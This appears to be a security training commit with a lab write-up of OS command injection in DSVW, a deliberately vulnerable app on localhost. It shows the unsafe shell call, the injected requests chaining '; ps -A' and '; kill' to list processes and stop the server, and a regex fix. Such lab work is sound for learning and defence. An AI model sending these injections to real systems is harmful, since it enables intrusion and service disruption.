Commit 6d1f8340 authored by Diego Restrepo Mesa's avatar Diego Restrepo Mesa

sol(vbd): #0 dsvw, 0077-os-command-injection

- discovered vulnerabilities: 1 by me, 3 already in repo, 4 total.
- total estimated vulnerabilities in system:   25
- discovery percentage:                        16%
- effort: 2 hours during immersion.
parent 9c84b02a
http://127.0.0.1:65412/?domain=www.google.com
\ No newline at end of file
## Version 1.4.1
## language: en
Feature:
TOE:
dsvw
Category:
OS Command Injection
Location:
http://127.0.0.1:65412/ - domain - (field)
CWE:
CWE-78: https://cwe.mitre.org/data/definitions/78.html
CWE-77: https://cwe.mitre.org/data/definitions/77.html
CWE-88: https://cwe.mitre.org/data/definitions/88.html
Rule:
REQ.173: https://fluidattacks.com/web/rules/173/
Goal:
Inject an OS command
Recommendation:
Use regex to validate user input
Background:
Hacker's software:
Hacker's software:
| <Software name> | <Version> |
| Ubuntu | 19.04 |
| Google Chrome | 75.0.3770.100 |
TOE information:
Given I am accessing the site http://127.0.0.1:65412/
And the server is running BaseHTTP version 0.3
And Python version 2.7.16
And SQLite version 3
Scenario: Normal use case
When I make the next request:
"""
GET http://127.0.0.1:65412/?domain=www.google.com HTTP/1.1
"""
Then I can get the following information:
"""
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: www.google.com
Address: 172.217.30.196
Name: www.google.com
Address: 2800:3f0:4005:401::2004
"""
Scenario: Static detection
When I look at the code of file DSVW\dsvw.py
"""
131 elif "domain" in params:
132 content = subprocess.check_output("nslookup " + params["domain"],
shell=True,
133 stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
"""
Then I see that the user input is not validated
And I conclude that the site is susceptible to OS command Injection
Scenario: Dynamic detection
When I see how the requests are made
"""
GET http://127.0.0.1:65412/?domain=www.google.com HTTP/1.1
"""
Then the domain parameter is passed through the url
When I insert invalid characters for a domain in the domain parameter
"""
GET http://127.0.0.1:65412/?domain=www.google.com ' HTTP/1.1
"""
Then the site returns
"""
/bin/sh: 1: Syntax error: Unterminated quoted string
"""
Then I can conclude that target parameter is a possible attack vector
Scenario: Exploitation
When I make the next request:
"""
GET http://127.0.0.1:65412/?domain=www.google.com ; ps -A HTTP/1.1
"""
Then I get the list of processes of server:
"""
PID TTY TIME CMD
8922 pts/5 00:00:00 bash
14054 ? 00:00:00 python3
9105 ? 00:00:00 python3
9555 tty2 00:00:06 chrome
9716 tty 00:00:21 chrome
"""
When I make the next request:
"""
GET http://127.0.0.1:65412/?domain=www.google.com ; kill 14054 HTTP/1.1
"""
Then I close the service of the web server
Then I can conclude that the vulnerability has been exploited
Scenario: Remediation
When I use regex to validate the domain:
"""
132 regex = r"^(?![0-9]+$)(?=([a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}
[a-zA-Z0-9])))((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])
?(?:\.[a-zA-Z](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)*))$"
133 matches = re.match(regex, params["domain"])
134 if matches:
135 content = subprocess.check_output("nslookup " + params["domain"],
shell=True,
136 stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
"""
Then I make the next request:
"""
GET http://127.0.0.1:65412/?domain=www.google.com ; ps -A HTTP/1.1
"""
Then the site doesn't return anything
Then I can confirm that the vulnerability was successfully patched
Scenario: Scoring
Severity scoring according to CVSSv3 standard
Base: Attributes that are constants over time and organizations
10/10 (High) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Temporal: Attributes that measure the exploit's popularity and fixability
9.7/10 (High) - E:H/RL:W/RC:C/
Environmental: Unique and relevant attributes to a specific user environment
8.9/10 (High) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H
Scenario: Correlations
No correlations have been found to this date 2019-07-29
......@@ -11,4 +11,4 @@ https://www.youtube.com/watch?v=LqX20TF3h7A
https://www.youtube.com/watch?v=b6UCPXDl73I
https://klarsen.net/infosec/owasp-webgoat-xss-lessons/
https://github.com/shantisuresh01/WebGoat-Lessons/blob/master/dom-xss/src/main/resources/plugin/DOMXSS/lessonSolutions/en/DOMXSS.html
https://github.com/fmauri/WebGoatSolutions/blob/master/Cross-SiteScripting_XSS/README.md
......@@ -13,3 +13,4 @@ http://sweet.ua.pt/andre.zuquete/Aulas/Seguranca/14-15/docss/Ex2.pdf
http://shubhamhacker.blogspot.com/2018/02/walkthrough-hello-guys-this-is-shubham.html
https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc#xss-stored
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#cross-site-scripting-lesson-7-exercise
https://github.com/fmauri/WebGoatSolutions/blob/master/Cross-SiteScripting_XSS/README.md
......@@ -25,3 +25,6 @@ https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc
https://www.youtube.com/watch?v=Yr0TIF5YoNM
https://sithlab.tistory.com/650
https://dlsdn73.tistory.com/607
https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc#sql-injection-advanced
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#sql-injection-advanced-lesson-3-exercise
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#sql-injection-advanced-lesson-5-exercise
......@@ -16,3 +16,6 @@ https://www.youtube.com/watch?v=up5z9kOgDB0
https://www.youtube.com/watch?v=9e4Q_p9Nuq8&list=PLrHVSJmDPvlqxCfBhPuksHdpViPyeZTsF&index=8
https://sithlab.tistory.com/649
https://sithlab.tistory.com/647
https://gist.github.com/tylernchls/97f8e2e907c84cfdc908c6f0fced1ddc#string-injection
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#sql-injection-lesson-7-exercise
https://github.com/WebGoat/WebGoat/wiki/Main-Exploits#sql-injection-lesson-8-exercise
......@@ -10,3 +10,4 @@ https://www.freebuf.com/column/169739.html
https://www.youtube.com/watch?v=G9l_rxYGkqM
https://www.youtube.com/watch?v=r7WG1xiFwj4
https://raw.githubusercontent.com/TheoKlein/WebGoat-Solution/master/Injection_Flaws/Numeric_SQL_Injection.md
https://github.com/fmauri/WebGoatSolutions/blob/master/InjectionFlaws/SqlInjection.md
......@@ -13,3 +13,4 @@ http://www.voidcn.com/article/p-dbhadgks-su.html
https://ephrain.net/security-webgoat-的-xss-與-sql-injection-初階練習/
https://www.youtube.com/watch?v=4iFIJ8IAcRc
https://raw.githubusercontent.com/TheoKlein/WebGoat-Solution/master/Injection_Flaws/String_SQL_Injection.md
https://github.com/fmauri/WebGoatSolutions/blob/master/InjectionFlaws/SqlInjection.md
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment